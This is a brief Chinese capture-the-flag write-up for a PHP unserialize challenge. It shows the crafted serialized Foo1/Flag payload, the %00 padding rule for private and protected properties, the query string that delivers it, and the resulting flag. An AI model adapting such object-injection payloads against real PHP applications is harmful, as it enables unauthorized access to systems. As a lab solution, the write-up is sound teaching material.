题目网址:
http://srpopty.cn:8081/PHP/serialize.php
看到声明了Foo1,重新构造Foo1,里面调用Flag类
得到构造的串:
O:4:"Foo1":1:{s:9:"%00Foo1%00obj";O:4:"Flag":0:{}}
注意:obj是私有变量,前面加类名,并且类名前后加上%00(保护类型的前加上%00*%00)
增加/?a=O:4:"Foo1":1:{s:9:"%00Foo1%00obj";O:4:"Flag":0:{}}
得到 flag{Be_cAr3fu1_uNseri4li2e}